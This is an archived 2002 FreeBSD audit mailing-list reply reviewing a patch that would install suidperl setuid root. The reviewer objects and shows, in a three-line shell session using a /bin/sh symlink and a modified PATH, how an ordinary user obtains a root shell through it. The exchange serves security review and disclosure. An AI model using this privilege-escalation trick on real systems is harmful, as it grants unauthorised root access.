Date: Thu, 4 Jul 2002 22:10:31 +1000 From: Tim Robbins <tjr@FreeBSD.ORG> To: Akinori MUSHA <knu@iDaemons.org> Cc: audit@FreeBSD.ORG Subject: Re: suidperl Message-ID: <20020704221031.A53275@dilbert.robbins.dropbear.id.au> In-Reply-To: <86sn2zpzmp.wl@daemon.musha.org>; from knu@iDaemons.org on Thu, Jul 04, 2002 at 07:15:58PM %2B0900 References: <86sn2zpzmp.wl@daemon.musha.org>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, Jul 04, 2002 at 07:15:58PM +0900, Akinori MUSHA wrote:
> Index: src/usr.bin/suidperl/Makefile
> ===================================================================
> RCS file: src/usr.bin/suidperl/Makefile
> diff -N src/usr.bin/suidperl/Makefile
> --- /dev/null 1 Jan 1970 00:00:00 -0000
> +++ src/usr.bin/suidperl/Makefile 4 Jul 2002 10:08:12 -0000
> @@ -0,0 +1,15 @@
> +# $FreeBSD$
> +
> +.PATH: ${.CURDIR}/../perl
> +
> +PROG= suidperl
> +SRCS= perl.c
> +NOMAN=
> +WARNS?= 6
> +
> +BINOWN= root
> +.if defined(ENABLE_SUIDPERL)
> +BINMODE=4555
> +.endif
This is unsafe:
$ ln -s /bin/sh /tmp/perl
$ env PATH=/tmp:$PATH /usr/bin/perl
# id
uid=1001(tim) euid=0(root) gid=1001(tim) groups=1001(tim), 0(wheel)
Tim
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-audit" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020704221031.A53275>